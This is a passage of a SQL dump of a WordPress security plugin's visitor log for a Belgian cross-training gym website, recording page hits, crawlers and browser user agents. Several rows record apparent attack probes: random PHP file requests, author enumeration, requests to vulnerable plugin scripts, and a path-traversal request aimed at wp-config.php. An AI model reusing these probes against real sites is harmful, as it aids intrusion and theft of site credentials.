(71427, 1493919682.303849, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71428, 1493919682.824890, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71429, 1493919683.283581, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71430, 1493919683.762598, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71431, 1493919684.861768, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71432, 1493919685.314728, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71433, 1493919685.784042, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71434, 1493920047.353641, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71435, 1493920047.935367, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71436, 1493920048.483728, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71437, 1493920048.999017, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71438, 1493920049.584288, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71439, 1493920050.120704, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71440, 1493920050.587359, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71441, 1493923693.072909, 2303379820, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71442, 1493925993.600079, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/'),
(71443, 1493925998.722670, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/'),
(71444, 1493927248.362864, 1123633555, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71445, 1493927249.357209, 1123633555, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71446, 1493932850.721052, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71447, 1493933202.340305, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/'),
(71448, 1493933264.323371, 856631529, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://pizza-tycoon.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(71449, 1493939230.434551, 786801763, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(71450, 1493939731.825870, 2760155459, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71451, 1493948115.171560, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/ghfhvvaw.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71452, 1493951707.187299, 2637637377, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71453, 1493952264.675038, 532202074, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.01.58 (KHTML, like Gecko) Chrome/57.4.9910.4747 Safari/534.41'),
(71454, 1493952266.699065, 532202074, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.01.58 (KHTML, like Gecko) Chrome/57.4.9910.4747 Safari/534.41'),
(71455, 1493952267.662746, 532202074, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/?author=2', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.01.58 (KHTML, like Gecko) Chrome/57.4.9910.4747 Safari/534.41'),
(71456, 1493953489.931554, 3652617241, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71457, 1493955057.727593, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71458, 1493955416.556780, 3024883593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71459, 1493959242.741295, 3472744462, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(71460, 1493959243.555587, 3472744462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(71461, 1493959244.116409, 3472744462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(71462, 1493959244.574594, 3472744462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(71463, 1493969616.747359, 3339975108, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71464, 1493969617.272103, 3250575437, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71465, 1493969620.441902, 3250575437, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71466, 1493969626.250608, 3339975108, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71467, 1493969626.702858, 3250575437, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71468, 1493969672.278537, 3339975108, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71469, 1493969672.754000, 3250575437, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71470, 1493969750.461623, 3250575437, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71471, 1493979267.257477, 3242976508, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjR4Y-6wtjTAhUHKcAKHcJhAqMQFggjMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(71472, 1493981016.128493, 3652617388, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71473, 1493984312.718466, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/hivcxa.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71474, 1493992318.148294, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71475, 1493995001.674861, 676177851, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71476, 1493996479.605257, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71477, 1493996480.101160, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71478, 1493996480.553580, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71479, 1493996481.347309, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71480, 1493996482.107802, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71481, 1493996482.530749, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71482, 1493996482.940608, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71483, 1493996483.373215, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71484, 1493996483.769306, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71485, 1493996484.192374, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71486, 1493996484.917952, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71487, 1493996485.676268, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71488, 1493996486.171827, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71489, 1493996486.735660, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71490, 1494002177.381814, 2961112076, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/woocommerce-catalog-enquiry/lib/jquery/upload/media-upload.js', 'http://www.crossfitpampa.com/wp-content/plugins/woocommerce-catalog-enquiry/lib/jquery/upload/media-upload.js', 'Mozilla/5.0 (Windows  U  Windows NT 6.0  en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7'),
(71491, 1494009702.473175, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71492, 1494009703.122787, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71493, 1494009703.763305, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71494, 1494009704.374830, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71495, 1494009704.824249, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71496, 1494009705.263680, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71497, 1494009705.818578, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71498, 1494009706.401214, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71499, 1494009706.878718, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71500, 1494009707.336894, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71501, 1494009707.803640, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71502, 1494010560.926244, 1538628086, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.bing.com/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(71503, 1494010562.401083, 1538628086, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(71504, 1494014744.638211, 1834501559, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/26.0.154727556 Mobile/14D27 Safari/602.1'),
(71505, 1494017986.958934, 1355389698, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71506, 1494017988.758378, 1355389698, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71507, 1494023368.685371, 3657088733, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71508, 1494028278.492859, 2637637376, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71509, 1494031963.608161, 3475901715, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71510, 1494036340.440737, 3475901859, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71511, 1494038288.008103, 676177840, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71512, 1494038288.008133, 676177840, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71513, 1494039436.906545, 1374838938, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71514, 1494039439.672645, 1374838938, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71515, 1494039522.782778, 1374838938, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71516, 1494039527.631863, 1374838938, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71517, 1494039530.588559, 1374838938, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71518, 1494039532.503626, 1374838938, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71519, 1494041291.256633, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(71520, 1494041300.967942, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(71521, 1494042623.840807, 3657088733, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71522, 1494045838.350070, 676177833, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71523, 1494049479.802663, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(71524, 1494051959.334428, 1338304237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71525, 1494056150.384537, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71526, 1494059046.699405, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/wpshop/includes/ajax.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71527, 1494060769.145906, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/awake/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71528, 1494062171.188958, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71529, 1494063693.228267, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71530, 1494065754.360026, 1338304237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71531, 1494066728.028302, 3273261686, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71532, 1494066728.592387, 3273261686, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71533, 1494066729.090205, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71534, 1494066729.597343, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71535, 1494066730.088639, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71536, 1494066730.651410, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71537, 1494066731.339832, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71538, 1494066731.782563, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71539, 1494066732.320749, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71540, 1494066732.857088, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71541, 1494066733.364530, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71542, 1494067063.122379, 3273261686, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71543, 1494067063.682625, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
